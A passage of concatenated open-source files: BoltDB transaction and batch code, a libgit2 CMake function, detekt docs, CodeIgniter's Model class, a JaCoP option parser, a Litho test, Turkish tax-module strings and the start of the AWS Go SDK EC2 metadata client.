db.freelist.release(minid - 1)
}
return t, nil
}
// removeTx removes a transaction from the database.
func (db *DB) removeTx(tx *Tx) {
// Release the read lock on the mmap.
db.mmaplock.RUnlock()
// Use the meta lock to restrict access to the DB object.
db.metalock.Lock()
// Remove the transaction.
for i, t := range db.txs {
if t == tx {
last := len(db.txs) - 1
db.txs[i] = db.txs[last]
db.txs[last] = nil
db.txs = db.txs[:last]
break
}
}
n := len(db.txs)
// Unlock the meta pages.
db.metalock.Unlock()
// Merge statistics.
db.statlock.Lock()
db.stats.OpenTxN = n
db.stats.TxStats.add(&tx.stats)
db.statlock.Unlock()
}
// Update executes a function within the context of a read-write managed transaction.
// If no error is returned from the function then the transaction is committed.
// If an error is returned then the entire transaction is rolled back.
// Any error that is returned from the function or returned from the commit is
// returned from the Update() method.
//
// Attempting to manually commit or rollback within the function will cause a panic.
func (db *DB) Update(fn func(*Tx) error) error {
t, err := db.Begin(true)
if err != nil {
return err
}
// Make sure the transaction rolls back in the event of a panic.
defer func() {
if t.db != nil {
t.rollback()
}
}()
// Mark as a managed tx so that the inner function cannot manually commit.
t.managed = true
// If an error is returned from the function then rollback and return error.
err = fn(t)
t.managed = false
if err != nil {
_ = t.Rollback()
return err
}
return t.Commit()
}
// View executes a function within the context of a managed read-only transaction.
// Any error that is returned from the function is returned from the View() method.
//
// Attempting to manually rollback within the function will cause a panic.
func (db *DB) View(fn func(*Tx) error) error {
t, err := db.Begin(false)
if err != nil {
return err
}
// Make sure the transaction rolls back in the event of a panic.
defer func() {
if t.db != nil {
t.rollback()
}
}()
// Mark as a managed tx so that the inner function cannot manually rollback.
t.managed = true
// If an error is returned from the function then pass it through.
err = fn(t)
t.managed = false
if err != nil {
_ = t.Rollback()
return err
}
if err := t.Rollback(); err != nil {
return err
}
return nil
}
// Batch calls fn as part of a batch. It behaves similar to Update,
// except:
//
// 1. concurrent Batch calls can be combined into a single Bolt
// transaction.
//
// 2. the function passed to Batch may be called multiple times,
// regardless of whether it returns error or not.
//
// This means that Batch function side effects must be idempotent and
// take permanent effect only after a successful return is seen in
// caller.
//
// The maximum batch size and delay can be adjusted with DB.MaxBatchSize
// and DB.MaxBatchDelay, respectively.
//
// Batch is only useful when there are multiple goroutines calling it.
func (db *DB) Batch(fn func(*Tx) error) error {
errCh := make(chan error, 1)
db.batchMu.Lock()
if (db.batch == nil) || (db.batch != nil && len(db.batch.calls) >= db.MaxBatchSize) {
// There is no existing batch, or the existing batch is full; start a new one.
db.batch = &batch{
db: db,
}
db.batch.timer = time.AfterFunc(db.MaxBatchDelay, db.batch.trigger)
}
db.batch.calls = append(db.batch.calls, call{fn: fn, err: errCh})
if len(db.batch.calls) >= db.MaxBatchSize {
// wake up batch, it's ready to run
go db.batch.trigger()
}
db.batchMu.Unlock()
err := <-errCh
if err == trySolo {
err = db.Update(fn)
}
return err
}
type call struct {
fn func(*Tx) error
err chan<- error
}
type batch struct {
db *DB
timer *time.Timer
start sync.Once
calls []call
}
// trigger runs the batch if it hasn't already been run.
func (b *batch) trigger() {
b.start.Do(b.run)
}
// run performs the transactions in the batch and communicates results
// back to DB.Batch.
func (b *batch) run() {
b.db.batchMu.Lock()
b.timer.Stop()
// Make sure no new work is added to this batch, but don't break
// other batches.
if b.db.batch == b {
b.db.batch = nil
}
b.db.batchMu.Unlock()
retry:
for len(b.calls) > 0 {
var failIdx = -1
err := b.db.Update(func(tx *Tx) error {
for i, c := range b.calls {
if err := safelyCall(c.fn, tx); err != nil {
failIdx = i
return err
}
}
return nil
})
if failIdx >= 0 {
// take the failing transaction out of the batch. it's
// safe to shorten b.calls here because db.batch no longer
// points to us, and we hold the mutex anyway.
c := b.calls[failIdx]
b.calls[failIdx], b.calls = b.calls[len(b.calls)-1], b.calls[:len(b.calls)-1]
// tell the submitter re-run it solo, continue with the rest of the batch
c.err <- trySolo
continue retry
}
// pass success, or bolt internal errors, to all callers
for _, c := range b.calls {
if c.err != nil {
c.err <- err
}
}
break retry
}
}
// trySolo is a special sentinel error value used for signaling that a
// transaction function should be re-run. It should never be seen by
// callers.
var trySolo = errors.New("batch function returned an error and should be re-run solo")
type panicked struct {
reason interface{}
}
func (p panicked) Error() string {
if err, ok := p.reason.(error); ok {
return err.Error()
}
return fmt.Sprintf("panic: %v", p.reason)
}
func safelyCall(fn func(*Tx) error, tx *Tx) (err error) {
defer func() {
if p := recover(); p != nil {
err = panicked{p}
}
}()
return fn(tx)
}
// Sync executes fdatasync() against the database file handle.
//
// This is not necessary under normal operation, however, if you use NoSync
// then it allows you to force the database file to sync against the disk.
func (db *DB) Sync() error { return fdatasync(db) }
// Stats retrieves ongoing performance stats for the database.
// This is only updated when a transaction closes.
func (db *DB) Stats() Stats {
db.statlock.RLock()
defer db.statlock.RUnlock()
return db.stats
}
// This is for internal access to the raw data bytes from the C cursor, use
// carefully, or not at all.
func (db *DB) Info() *Info {
return &Info{uintptr(unsafe.Pointer(&db.data[0])), db.pageSize}
}
// page retrieves a page reference from the mmap based on the current page size.
func (db *DB) page(id pgid) *page {
pos := id * pgid(db.pageSize)
return (*page)(unsafe.Pointer(&db.data[pos]))
}
// pageInBuffer retrieves a page reference from a given byte array based on the current page size.
func (db *DB) pageInBuffer(b []byte, id pgid) *page {
return (*page)(unsafe.Pointer(&b[id*pgid(db.pageSize)]))
}
// meta retrieves the current meta page reference.
func (db *DB) meta() *meta {
// We have to return the meta with the highest txid which doesn't fail
// validation. Otherwise, we can cause errors when in fact the database is
// in a consistent state. metaA is the one with the higher txid.
metaA := db.meta0
metaB := db.meta1
if db.meta1.txid > db.meta0.txid {
metaA = db.meta1
metaB = db.meta0
}
// Use higher meta page if valid. Otherwise fallback to previous, if valid.
if err := metaA.validate(); err == nil {
return metaA
} else if err := metaB.validate(); err == nil {
return metaB
}
// This should never be reached, because both meta1 and meta0 were validated
// on mmap() and we do fsync() on every write.
panic("bolt.DB.meta(): invalid meta pages")
}
// allocate returns a contiguous block of memory starting at a given page.
func (db *DB) allocate(count int) (*page, error) {
// Allocate a temporary buffer for the page.
var buf []byte
if count == 1 {
buf = db.pagePool.Get().([]byte)
} else {
buf = make([]byte, count*db.pageSize)
}
p := (*page)(unsafe.Pointer(&buf[0]))
p.overflow = uint32(count - 1)
// Use pages from the freelist if they are available.
if p.id = db.freelist.allocate(count); p.id != 0 {
return p, nil
}
// Resize mmap() if we're at the end.
p.id = db.rwtx.meta.pgid
var minsz = int((p.id+pgid(count))+1) * db.pageSize
if minsz >= db.datasz {
if err := db.mmap(minsz); err != nil {
return nil, fmt.Errorf("mmap allocate error: %s", err)
}
}
// Move the page id high water mark.
db.rwtx.meta.pgid += pgid(count)
return p, nil
}
// grow grows the size of the database to the given sz.
func (db *DB) grow(sz int) error {
// Ignore if the new size is less than available file size.
if sz <= db.filesz {
return nil
}
// If the data is smaller than the alloc size then only allocate what's needed.
// Once it goes over the allocation size then allocate in chunks.
if db.datasz < db.AllocSize {
sz = db.datasz
} else {
sz += db.AllocSize
}
// Truncate and fsync to ensure file size metadata is flushed.
// https://github.com/boltdb/bolt/issues/284
if !db.NoGrowSync && !db.readOnly {
if runtime.GOOS != "windows" {
if err := db.file.Truncate(int64(sz)); err != nil {
return fmt.Errorf("file resize error: %s", err)
}
}
if err := db.file.Sync(); err != nil {
return fmt.Errorf("file sync error: %s", err)
}
}
db.filesz = sz
return nil
}
func (db *DB) IsReadOnly() bool {
return db.readOnly
}
// Options represents the options that can be set when opening a database.
type Options struct {
// Timeout is the amount of time to wait to obtain a file lock.
// When set to zero it will wait indefinitely. This option is only
// available on Darwin and Linux.
Timeout time.Duration
// Sets the DB.NoGrowSync flag before memory mapping the file.
NoGrowSync bool
// Open database in read-only mode. Uses flock(..., LOCK_SH |LOCK_NB) to
// grab a shared lock (UNIX).
ReadOnly bool
// Sets the DB.MmapFlags flag before memory mapping the file.
MmapFlags int
// InitialMmapSize is the initial mmap size of the database
// in bytes. Read transactions won't block write transaction
// if the InitialMmapSize is large enough to hold database mmap
// size. (See DB.Begin for more information)
//
// If <=0, the initial map size is 0.
// If initialMmapSize is smaller than the previous database size,
// it takes no effect.
InitialMmapSize int
}
// DefaultOptions represent the options used if nil options are passed into Open().
// No timeout is used which will cause Bolt to wait indefinitely for a lock.
var DefaultOptions = &Options{
Timeout: 0,
NoGrowSync: false,
}
// Stats represents statistics about the database.
type Stats struct {
// Freelist stats
FreePageN int // total number of free pages on the freelist
PendingPageN int // total number of pending pages on the freelist
FreeAlloc int // total bytes allocated in free pages
FreelistInuse int // total bytes used by the freelist
// Transaction stats
TxN int // total number of started read transactions
OpenTxN int // number of currently open read transactions
TxStats TxStats // global, ongoing stats.
}
// Sub calculates and returns the difference between two sets of database stats.
// This is useful when obtaining stats at two different points and time and
// you need the performance counters that occurred within that time span.
func (s *Stats) Sub(other *Stats) Stats {
if other == nil {
return *s
}
var diff Stats
diff.FreePageN = s.FreePageN
diff.PendingPageN = s.PendingPageN
diff.FreeAlloc = s.FreeAlloc
diff.FreelistInuse = s.FreelistInuse
diff.TxN = s.TxN - other.TxN
diff.TxStats = s.TxStats.Sub(&other.TxStats)
return diff
}
func (s *Stats) add(other *Stats) {
s.TxStats.add(&other.TxStats)
}
type Info struct {
Data uintptr
PageSize int
}
type meta struct {
magic uint32
version uint32
pageSize uint32
flags uint32
root bucket
freelist pgid
pgid pgid
txid txid
checksum uint64
}
// validate checks the marker bytes and version of the meta page to ensure it matches this binary.
func (m *meta) validate() error {
if m.magic != magic {
return ErrInvalid
} else if m.version != version {
return ErrVersionMismatch
} else if m.checksum != 0 && m.checksum != m.sum64() {
return ErrChecksum
}
return nil
}
// copy copies one meta object to another.
func (m *meta) copy(dest *meta) {
*dest = *m
}
// write writes the meta onto a page.
func (m *meta) write(p *page) {
if m.root.root >= m.pgid {
panic(fmt.Sprintf("root bucket pgid (%d) above high water mark (%d)", m.root.root, m.pgid))
} else if m.freelist >= m.pgid {
panic(fmt.Sprintf("freelist pgid (%d) above high water mark (%d)", m.freelist, m.pgid))
}
// Page id is either going to be 0 or 1 which we can determine by the transaction ID.
p.id = pgid(m.txid % 2)
p.flags |= metaPageFlag
// Calculate the checksum.
m.checksum = m.sum64()
m.copy(p.meta())
}
// generates the checksum for the meta.
func (m *meta) sum64() uint64 {
var h = fnv.New64a()
_, _ = h.Write((*[unsafe.Offsetof(meta{}.checksum)]byte)(unsafe.Pointer(m))[:])
return h.Sum64()
}
// _assert will panic with a given formatted message if the given condition is false.
func _assert(condition bool, msg string, v ...interface{}) {
if !condition {
panic(fmt.Sprintf("assertion failed: "+msg, v...))
}
}
func warn(v ...interface{}) { fmt.Fprintln(os.Stderr, v...) }
func warnf(msg string, v ...interface{}) { fmt.Fprintf(os.Stderr, msg+"\n", v...) }
func printstack() {
stack := strings.Join(strings.Split(string(debug.Stack()), "\n")[2:], "\n")
fmt.Fprintln(os.Stderr, stack)
}
| {
"pile_set_name": "Github"
} |
# This function splits the sources files up into their appropriate
# subdirectories. This is especially useful for IDEs like Xcode and
# Visual Studio, so that you can navigate into the libgit2_clar project,
# and see the folders within the tests folder (instead of just seeing all
# source and tests in a single folder.)
FUNCTION(IDE_SPLIT_SOURCES target)
IF(MSVC_IDE OR CMAKE_GENERATOR STREQUAL Xcode)
GET_TARGET_PROPERTY(sources ${target} SOURCES)
FOREACH(source ${sources})
IF(source MATCHES ".*/")
STRING(REPLACE ${libgit2_SOURCE_DIR}/ "" rel ${source})
IF(rel)
STRING(REGEX REPLACE "/([^/]*)$" "" rel ${rel})
IF(rel)
STRING(REPLACE "/" "\\\\" rel ${rel})
SOURCE_GROUP(${rel} FILES ${source})
ENDIF()
ENDIF()
ENDIF()
ENDFOREACH()
ENDIF()
ENDFUNCTION()
| {
"pile_set_name": "Github"
} |
---
title: Companion -
---
//[detekt-api](../../../index.md)/[io.gitlab.arturbosch.detekt.api.internal](../../index.md)/[YamlConfig](../index.md)/[Companion](index.md)
# Companion
[jvm] object [Companion](index.md)
## Functions
| Name| Summary|
|---|---|
| [equals](index.md#kotlin/Any/equals/#kotlin.Any?/PointingToDeclaration/)| [jvm] <br>Content <br>open operator override fun [equals](index.md#kotlin/Any/equals/#kotlin.Any?/PointingToDeclaration/)(other: [Any](https://kotlinlang.org/api/latest/jvm/stdlib/kotlin/-any/index.html)?): [Boolean](https://kotlinlang.org/api/latest/jvm/stdlib/kotlin/-boolean/index.html) <br><br><br>
| [hashCode](index.md#kotlin/Any/hashCode/#/PointingToDeclaration/)| [jvm] <br>Content <br>open override fun [hashCode](index.md#kotlin/Any/hashCode/#/PointingToDeclaration/)(): [Int](https://kotlinlang.org/api/latest/jvm/stdlib/kotlin/-int/index.html) <br><br><br>
| [load](load.md)| [jvm] <br>Brief description <br><br><br><br><br>Constructs a [YamlConfig](../index.md) from any [Reader](https://docs.oracle.com/javase/8/docs/api/java/io/Reader.html).<br><br><br><br>Note the reader will be consumed and closed.<br><br><br><br> <br>Content <br>fun [load](load.md)(reader: [Reader](https://docs.oracle.com/javase/8/docs/api/java/io/Reader.html)): [Config](../../../io.gitlab.arturbosch.detekt.api/-config/index.md) <br><br><br>[jvm] <br>Brief description <br><br><br>Factory method to load a yaml configuration. Given path must exist and point to a readable file.<br><br> <br>Content <br>fun [load](load.md)(path: [Path](https://docs.oracle.com/javase/8/docs/api/java/nio/file/Path.html)): [Config](../../../io.gitlab.arturbosch.detekt.api/-config/index.md) <br><br><br>
| [loadResource](load-resource.md)| [jvm] <br>Brief description <br><br><br>Factory method to load a yaml configuration from a URL.<br><br> <br>Content <br>fun [loadResource](load-resource.md)(url: [URL](https://docs.oracle.com/javase/8/docs/api/java/net/URL.html)): [Config](../../../io.gitlab.arturbosch.detekt.api/-config/index.md) <br><br><br>
| [toString](index.md#kotlin/Any/toString/#/PointingToDeclaration/)| [jvm] <br>Content <br>open override fun [toString](index.md#kotlin/Any/toString/#/PointingToDeclaration/)(): [String](https://kotlinlang.org/api/latest/jvm/stdlib/kotlin/-string/index.html) <br><br><br>
| {
"pile_set_name": "Github"
} |
<?php
/**
* CodeIgniter
*
* An open source application development framework for PHP 5.2.4 or newer
*
* NOTICE OF LICENSE
*
* Licensed under the Open Software License version 3.0
*
* This source file is subject to the Open Software License (OSL 3.0) that is
* bundled with this package in the files license.txt / license.rst. It is
* also available through the world wide web at this URL:
* http://opensource.org/licenses/OSL-3.0
* If you did not receive a copy of the license and are unable to obtain it
* through the world wide web, please send an email to
* [email protected] so we can send you a copy immediately.
*
* @package CodeIgniter
* @author EllisLab Dev Team
* @copyright Copyright (c) 2008 - 2013, EllisLab, Inc. (http://ellislab.com/)
* @license http://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0)
* @link http://codeigniter.com
* @since Version 1.0
* @filesource
*/
defined('BASEPATH') OR exit('No direct script access allowed');
/**
* Model Class
*
* @package CodeIgniter
* @subpackage Libraries
* @category Libraries
* @author EllisLab Dev Team
* @link http://codeigniter.com/user_guide/libraries/config.html
*/
class CI_Model {
/**
* Class constructor
*
* @return void
*/
public function __construct()
{
log_message('debug', 'Model Class Initialized');
}
// --------------------------------------------------------------------
/**
* __get magic
*
* Allows models to access CI's loaded classes using the same
* syntax as controllers.
*
* @param string $key
*/
public function __get($key)
{
return get_instance()->$key;
}
}
/* End of file Model.php */
/* Location: ./system/core/Model.php */ | {
"pile_set_name": "Github"
} |
/*
* OptParse.java
* <p>
* This file is part of JaCoP.
* <p>
* JaCoP is a Java Constraint Programming solver.
* <p>
* Copyright (C) 2000-2008 Krzysztof Kuchcinski and Radoslaw Szymanek
* <p>
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
* <p>
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
* <p>
* Notwithstanding any other provision of this License, the copyright
* owners of this work supplement the terms of this License with terms
* prohibiting misrepresentation of the origin of this work and requiring
* that modified versions of this work be marked in reasonable ways as
* different from the original version. This supplement of the license
* terms is in accordance with Section 7 of GNU Affero General Public
* License version 3.
* <p>
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.jacop.jasat.utils;
import java.util.*;
/**
* util to parse command-line arguments
*
* @author Simon Cruanes and Radoslaw Szymanek
* @version 4.7
*/
public class OptParse<E> {
// remaining (true) args
public String[] realArgs;
// handlers
private Map<String, OptHandler<E>> handlers = new HashMap<String, OptHandler<E>>();
// the main help string
private String mainHelp = "";
/**
* add a handler for some option
*
* @param handler the handler
*/
public void addHandler(OptHandler<E> handler) {
if (handler.longOpt != null)
handlers.put("--" + handler.longOpt, handler);
if (handler.shortOpt != '\0')
handlers.put("-" + handler.shortOpt, handler);
}
/**
* change the main help string, which will be printed if asked, or
* if a wrong option is given
*
* @param helpString the help string
*/
public void setHelp(String helpString) {
this.mainHelp = helpString;
}
public E parse(String[] args, E e) {
realArgs = new String[args.length];
int realIndex = 0;
// the object
E current = e;
// iterate on arguments
for (int i = 0; i < args.length; i++) {
if (args[i].startsWith("-") || args[i].startsWith("--")) {
if (args[i].equals("-")) {
// exception: this is not an option
realArgs[realIndex++] = args[i];
continue;
}
// parse this as an option
int loc = args[i].indexOf("=");
String key = (loc > 0) ? args[i].substring(0, loc) : args[i];
String value = (loc > 0) ? args[i].substring(loc + 1) : "";
if (!handlers.containsKey(key)) {
// this option is not registered
System.out.println("unknown option: " + key);
printHelp();
return null;
} else {
current = handlers.get(key).handle(this, current, value);
}
} else {
realArgs[realIndex++] = args[i];
}
}
// truncate the "real args" array and return the E value
this.realArgs = Arrays.copyOf(realArgs, realIndex);
return current;
}
/**
* print help of all options
*/
public void printHelp() {
// print the main help message
System.out.println(mainHelp);
System.out.println("options:");
// print (only once for each handler) its help
Set<OptHandler<E>> printedHelps = new HashSet<OptHandler<E>>();
for (OptHandler<E> handler : handlers.values()) {
if (printedHelps.contains(handler))
continue;
else
printedHelps.add(handler);
// print help for this handler
String msg = String.format("-%c, --%-16s %s", handler.shortOpt, handler.longOpt, handler.help);
System.out.println(msg);
}
}
/**
* a handler can call this to interrupt the parsing
*/
public void exitParsing() {
throw new RuntimeException("stop parsing");
}
/**
* a class to handle one option
*
* @param E the object to apply modifications to
* @author simon
*/
public static abstract class OptHandler<E> {
// short name of the option
public char shortOpt;
// long name of the option
public String longOpt;
// help string
public String help;
/**
* handler for the option
*
* @param parser the parser object that called this handler
* @param e the object to modify according to the option
* @param arg the (optional) argument to the option
* @return a value of the good type (not necessarily the given one)
*/
public abstract E handle(OptParse<E> parser, E e, String arg);
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.facebook.litho;
import static com.facebook.litho.LifecycleStep.getSteps;
import static org.assertj.core.api.Java6Assertions.assertThat;
import com.facebook.litho.testing.LithoViewRule;
import com.facebook.litho.testing.testrunner.LithoTestRunner;
import com.facebook.litho.widget.LayoutSpecTriggerTester;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.atomic.AtomicReference;
import org.junit.Rule;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(LithoTestRunner.class)
public class LayoutSpecTriggerTest {
public final @Rule LithoViewRule mLithoViewRule = new LithoViewRule();
@Test
public void layoutSpec_setRootAndTriggerEvent_eventIsTriggered() {
final ComponentContext componentContext = mLithoViewRule.getContext();
final AtomicReference<Object> triggerObjectRef = new AtomicReference<>();
final Handle triggerHandle = new Handle();
final List<LifecycleStep.StepInfo> info = new ArrayList<>();
final Component component =
LayoutSpecTriggerTester.create(componentContext)
.steps(info)
.triggerObjectRef(triggerObjectRef)
.handle(triggerHandle)
.build();
mLithoViewRule.setRoot(component);
mLithoViewRule.attachToWindow().measure().layout();
final Object bazObject = new Object();
// We need to use a ComponentContext with a ComponentTree on it
LayoutSpecTriggerTester.triggerTestEvent(
mLithoViewRule.getComponentTree().getContext(), triggerHandle, bazObject);
assertThat(getSteps(info))
.describedAs("Should call @OnTrigger method")
.containsExactly(LifecycleStep.ON_TRIGGER);
assertThat(triggerObjectRef.get())
.describedAs("Event object is correctly passed")
.isEqualTo(bazObject);
}
}
| {
"pile_set_name": "Github"
} |
<?php
$lang["taxes_add_exception"] = "İstisna Ekle";
$lang["taxes_cascade"] = "Kademeli";
$lang["taxes_cascade_sequence"] = "Kademeli Sıra";
$lang["taxes_city"] = "Şehir";
$lang["taxes_code"] = "Kod";
$lang["taxes_confirm_delete"] = "Bu Vergi Kodunu silmek istediğinize emin misiniz? Bu eylem geri alınamaz";
$lang["taxes_confirm_restore"] = "Seçili Vergi Kodlarını geri yüklemek istediğinizden emin misiniz?";
$lang["taxes_default_tax_category"] = "Varsayılan Vergi Kategorisi";
$lang["taxes_default_tax_rate"] = "Varsayılan Vergi Oranı";
$lang["taxes_error_adding_updating"] = "Vergi Kodu ekleme ya da güncelleme başarısız oldu";
$lang["taxes_group_seq"] = "Küme Sırası";
$lang["taxes_jurisdiction_name"] = "Yetki Adı";
$lang["taxes_name"] = "Ad";
$lang["taxes_new"] = "Yeni Vergi Kodu";
$lang["taxes_no_taxes_to_display"] = "Görüntülenecek Vergi Kodu Yok";
$lang["taxes_reporting_authority"] = "Rapor Makamı";
$lang["taxes_round_half_down"] = "Yarım Aşağı";
$lang["taxes_round_half_even"] = "Yarım Çift";
$lang["taxes_round_half_odd"] = "Yarım Tek";
$lang["taxes_round_half_up"] = "Yarım Yukarı";
$lang["taxes_rounding_code"] = "Yuvarlama Kodu";
$lang["taxes_sales_tax"] = "Satış Vergisi";
$lang["taxes_sales_tax_by_invoice"] = "Fatura ile Satış Vergisi";
$lang["taxes_sequence"] = "Sıra";
$lang["taxes_state"] = "Eyalet";
$lang["taxes_successful_deleted"] = "Başarıyla sildiniz";
$lang["taxes_tax_categories"] = "Vergi Kategorileri";
$lang["taxes_tax_categories_configuration"] = "Vergi Kategorileri Yapılandırması";
$lang["taxes_tax_categories_saved_successfully"] = "Vergi Kategorileri değişiklikleri kaydedildi";
$lang["taxes_tax_categories_saved_unsuccessfully"] = "Vergi Kategorileri değişiklikleri kaydedilmedi";
$lang["taxes_tax_category"] = "Vergi Kategorisi";
$lang["taxes_tax_category_code"] = "Vergi Kategori Kodu";
$lang["taxes_tax_category_duplicate"] = "Yinelenen vergi kategorisi";
$lang["taxes_tax_category_invalid_chars"] = "Vergi kategorisi adında geçersiz karakterler";
$lang["taxes_tax_category_name"] = "Vergi Kategorisi Adı";
$lang["taxes_tax_category_new"] = "Yeni Vergi Kategorisi";
$lang["taxes_tax_category_required"] = "Vergi kategorisi gerekli";
$lang["taxes_tax_code"] = "Vergi Kodu";
$lang["taxes_tax_code_cannot_be_deleted"] = "Vergi Kodu silme işlemi başarısız oldu";
$lang["taxes_tax_code_duplicate"] = "Yinelenen vergi kodu";
$lang["taxes_tax_code_invalid_chars"] = "Vergi kodunda geçersiz karakterler";
$lang["taxes_tax_code_name"] = "Vergi Kodu Adı";
$lang["taxes_tax_code_required"] = "Vergi Kodu zorunlu bir alandır";
$lang["taxes_tax_code_successful_deleted"] = "Vergi Kodunu başarıyla sildiniz";
$lang["taxes_tax_code_successful_updated"] = "Başarıyla güncellediniz";
$lang["taxes_tax_code_successful_updating"] = "Vergi Kodunu başarıyla güncellediniz";
$lang["taxes_tax_code_successfully_added"] = "Başarıyla eklediniz";
$lang["taxes_tax_code_type"] = "Vergi Kodu Türü";
$lang["taxes_tax_codes"] = "Vergi Kodları";
$lang["taxes_tax_codes_configuration"] = "Vergi Kodları Yapılandırması";
$lang["taxes_tax_codes_saved_successfully"] = "Vergi Kodu değişiklikleri kaydedildi";
$lang["taxes_tax_codes_saved_unsuccessfully"] = "Vergi Kodu değişiklikleri kaydedilmedi";
$lang["taxes_tax_excluded"] = "Vergi hariç";
$lang["taxes_tax_group"] = "Vergi Kümesi";
$lang["taxes_tax_group_not_unique"] = "%1 Vergi Kümesi eşsiz değil";
$lang["taxes_tax_group_sequence"] = "Vergi Kümesi Sırası";
$lang["taxes_tax_included"] = "Vergi dahil";
$lang["taxes_tax_jurisdiction"] = "Vergi Yargı Yetkisi";
$lang["taxes_tax_jurisdiction_duplicate"] = "Yinelenen vergi yetkisi";
$lang["taxes_tax_jurisdiction_invalid_chars"] = "Yetki adında geçersiz karakterler";
$lang["taxes_tax_jurisdiction_required"] = "Vergi yargı yetkisi gerekiyor";
$lang["taxes_tax_jurisdictions"] = "Vergi Yargı Yetkisi";
$lang["taxes_tax_jurisdictions_configuration"] = "Vergi Yargı Yetkisi Yapılandırması";
$lang["taxes_tax_jurisdictions_saved_successfully"] = "Vergi Yargı yetkisi değişiklikleri kaydedildi";
$lang["taxes_tax_jurisdictions_saved_unsuccessfully"] = "Vergi Yargı yetkisi değişiklikleri kaydedilmedi";
$lang["taxes_tax_rate"] = "Vergi Oranı";
$lang["taxes_tax_rate_configuration"] = "Vergi Oranı Yapılandırması";
$lang["taxes_tax_rate_error_adding_updating"] = "Vergi Oranı ekleme veya güncelleme işlemi başarısız oldu";
$lang["taxes_tax_rate_numeric"] = "Vergi Oranı bir sayı olmalıdır";
$lang["taxes_tax_rate_required"] = "Vergi Oranı zorunlu bir alandır";
$lang["taxes_tax_rate_successful_updated"] = "Başarıyla güncellendi";
$lang["taxes_tax_rate_successfully_added"] = "Başarıyla ekledi";
$lang["taxes_tax_rates"] = "Vergi Oranları";
$lang["taxes_tax_rates_configuration"] = "Vergi Oranları Yapılandırması";
$lang["taxes_tax_rounding"] = "Vergi Yuvarlama";
$lang["taxes_tax_type"] = "Tür";
$lang["taxes_update"] = "Vergi Oranını Güncelle";
$lang["taxes_vat_tax"] = "KDV Vergisi";
| {
"pile_set_name": "Github"
} |
// Package ec2metadata provides the client for making API calls to the
// EC2 Metadata service.
//
// This package's client can be disabled completely by setting the environment
// variable "AWS_EC2_METADATA_DISABLED=true". This environment variable set to
// true instructs the SDK to disable the EC2 Metadata client. The client cannot
// be used while the environment variable is set to true, (case insensitive).
package ec2metadata
import (
"bytes"
"errors"
"io"
"net/http"
"os"
"strconv"
"strings"
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/awserr"
"github.com/aws/aws-sdk-go/aws/client"
"github.com/aws/aws-sdk-go/aws/client/metadata"
"github.com/aws/aws-sdk-go/aws/corehandlers"
"github.com/aws/aws-sdk-go/aws/request"
)
const (
// ServiceName is the name of the service.
ServiceName = "ec2metadata"
disableServiceEnvVar = "AWS_EC2_METADATA_DISABLED"
// Headers for Token and TTL
ttlHeader = "x-aws-ec2-metadata-token-ttl-seconds"
tokenHeader = "x-aws-ec2-metadata-token"
// Named Handler constants
fetchTokenHandlerName = "FetchTokenHandler"
unmarshalMetadataHandlerName = "unmarshalMetadataHandler"
unmarshalTokenHandlerName = "unmarshalTokenHandler"
enableTokenProviderHandlerName = "enableTokenProviderHandler"
// TTL constants
defaultTTL = 21600 * time.Second
ttlExpirationWindow = 30 * time.Second
)
// A EC2Metadata is an EC2 Metadata service Client.
type EC2Metadata struct {
*client.Client
}
// New creates a new instance of the EC2Metadata client with a session.
// This client is safe to use across multiple goroutines.
//
//
// Example:
// // Create a EC2Metadata client from just a session.
// svc := ec2metadata.New(mySession)
//
// // Create a EC2Metadata client with additional configuration
// svc := ec2metadata.New(mySession, aws.NewConfig().WithLogLevel(aws.LogDebugHTTPBody))
func New(p client.ConfigProvider, cfgs ...*aws.Config) *EC2Metadata {
c := p.ClientConfig(ServiceName, cfgs...)
return NewClient(*c.Config, c.Handlers, c.Endpoint, c.SigningRegion)
}
// NewClient returns a new EC2Metadata client. Should be used to create
// a client when not using a session. Generally using just New with a session
// is preferred.
//
// If an unmodified HTTP client is provided from the stdlib default, or no client
// the EC2RoleProvider's EC2Metadata HTTP client's timeout will be shortened.
// To disable this set Config.EC2MetadataDisableTimeoutOverride to false. Enabled by default.
func NewClient(cfg aws.Config, handlers request.Handlers, endpoint, signingRegion string, opts ...func(*client.Client)) *EC2Metadata {
if !aws.BoolValue(cfg.EC2MetadataDisableTimeoutOverride) && httpClientZero(cfg.HTTPClient) {
// If the http client is unmodified and this feature is not disabled
// set custom timeouts for EC2Metadata requests.
cfg.HTTPClient = &http.Client{
// use a shorter timeout than default because the metadata
// service is local if it is running, and to fail faster
// if not running on an ec2 instance.
Timeout: 1 * time.Second,
}
// max number of retries on the client operation
cfg.MaxRetries = aws.Int(2)
}
svc := &EC2Metadata{
Client: client.New(
cfg,
metadata.ClientInfo{
ServiceName: ServiceName,
ServiceID: ServiceName,
Endpoint: endpoint,
APIVersion: "latest",
},
handlers,
),
}
// token provider instance
tp := newTokenProvider(svc, defaultTTL)
// NamedHandler for fetching token
svc.Handlers.Sign.PushBackNamed(request.NamedHandler{
Name: fetchTokenHandlerName,
Fn: tp.fetchTokenHandler,
})
// NamedHandler for enabling token provider
svc.Handlers.Complete.PushBackNamed(request.NamedHandler{
Name: enableTokenProviderHandlerName,
Fn: tp.enableTokenProviderHandler,
})
svc.Handlers.Unmarshal.PushBackNamed(unmarshalHandler)
svc.Handlers.UnmarshalError.PushBack(unmarshalError)
svc.Handlers.Validate.Clear()
svc.Handlers.Validate.PushBack(validateEndpointHandler)
